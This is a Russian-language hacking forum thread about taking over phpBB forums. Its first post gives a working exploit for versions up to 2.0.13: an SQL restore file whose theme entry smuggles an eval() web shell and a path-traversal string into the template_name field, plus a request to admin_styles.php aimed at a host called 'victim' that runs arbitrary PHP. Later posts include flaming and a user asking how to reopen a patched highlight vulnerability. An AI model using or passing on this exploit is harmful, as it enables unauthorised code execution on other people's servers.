Это не просто неправда, а ересь... а вот действенный метод: заходишь под админом (это если админский доступ есль, а иначе - не получится) Затем идешь в восстановление базы, и восстанавливаешь из такого файла: DROP TABLE IF EXISTS phpbb_themes; CREATE TABLE phpbb_themes ( themes_id mediumint(8) unsigned NOT NULL auto_increment, template_name varchar(30) NOT NULL, style_name varchar(30) NOT NULL, head_stylesheet varchar(100), body_background varchar(100), body_bgcolor varchar(6), body_text varchar(6), body_link varchar(6), body_vlink varchar(6), body_alink varchar(6), body_hlink varchar(6), tr_color1 varchar(6), tr_color2 varchar(6), tr_color3 varchar(6), tr_class1 varchar(25), tr_class2 varchar(25), tr_class3 varchar(25), th_color1 varchar(6), th_color2 varchar(6), th_color3 varchar(6), th_class1 varchar(25), th_class2 varchar(25), th_class3 varchar(25), td_color1 varchar(6), td_color2 varchar(6), td_color3 varchar(6), td_class1 varchar(25), td_class2 varchar(25), td_class3 varchar(25), fontface1 varchar(50), fontface2 varchar(50), fontface3 varchar(50), fontsize1 tinyint(4), fontsize2 tinyint(4), fontsize3 tinyint(4), fontcolor1 varchar(6), fontcolor2 varchar(6), fontcolor3 varchar(6), span_class1 varchar(25), span_class2 varchar(25), span_class3 varchar(25), img_size_poll smallint(5) unsigned, img_size_privmsg smallint(5) unsigned, PRIMARY KEY (themes_id) ); INSERT INTO phpbb_themes (themes_id, template_name, style_name,head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink,body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2,tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3,td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1, fontface2,fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2, fontcolor3,span_class1, span_class2, span_class3, img_size_poll, img_size_privmsg) VALUES('1', 'subSilver', 'subSilver', 'subSilver.css','', 'E5E5E5','000000','006699', '5493B4', '', 'DD6900', 'EFEFEF', 'DEE3E7', 'D1D7DC', '','', '', '98AAB1', '006699', 'FFFFFF', 'cellpic1.gif', 'cellpic3.gif','cellpic2.jpg', 'FAFAFA', 'FFFFFF', '', 'row1', 'row2', '', 'Verdana,Arial, Helvetica, sans-serif', 'Trebuchet MS', 'Courier, \'Courier New\',sans-serif', '10', '11', '12', '444444', '006600', 'FFA34F', '','', '', NULL, NULL); UPDATE phpbb_config set config_value="1" where config_name="default_style"; INSERT INTO phpbb2_themes (themes_id, template_name, style_name,head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink,body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2,tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3,td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1,fontface2, fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2,fontcolor3, span_class1, span_class2, span_class3, img_size_poll, img_size_privmsg)VALUES('2', '"//template_name varchar(30) NOT NULL,aaa=12;eval(stripslashes($_REQUEST[coylisgod]));exit();// /../../../../../../../../../../../../../../../../../../../tmp', 'FI Black', 'fiblack.css', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'row1', 'row2', '', '', '', '', '0','0', '0', '', '006699', 'ffa34f', 'cc', 'bb', 'a', '0', '0'); Вот. потом идешь по адресу hтtp://forum.zhertva/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&coylisgod=[ЗДЕСЬ ПХП-КОД]&sid=[ЗДЕСЬ СВОЮ СЕССИЮ] И твой пхп-код выполнится, далее делай, что хочешь... з.ы. работает только до 13-й версии з.з.ы. благодарностей не надо
ДИБИЛ бля чего хочешь??ты спросил где взять серв.н а я ответил что в инете есть готовый уже экзешник!если тебе не нужна программа то на *** ты ее компилить хотел???
А можно такую вещь сделать.Вот например есть там форум на phpBB 2.0.10 .К несчастью он пропатчен.Тоесть уязвимость в highlight не работает.Вдруг я получу права админа на форуме.Могу я с помощью восстановить БД или там чего либо,получить дыру в этом форуме.Чтоб снова бы работала уязвимость.
Это вопрос? если да, то вышеописанный способ действует на всех версиях до 2.0.13 включительно. 2 монстер даже отвечать ничего не хочется... головой думай. и ваще хватит флеймить.
хмм... чё-то вы отошли от темы кажись... а про то чтоб слить БД... слить можно, тока её переделать, чтоб была возможность бага непропатченоого форума.. сорри... но это ПОЛНЫЙ ЛОЛ !!!! баг с highlight как раз и берёт грубо говоря л:п из БД =)) её нужно нефигово проработать и переделать, чтоб было всё пучком
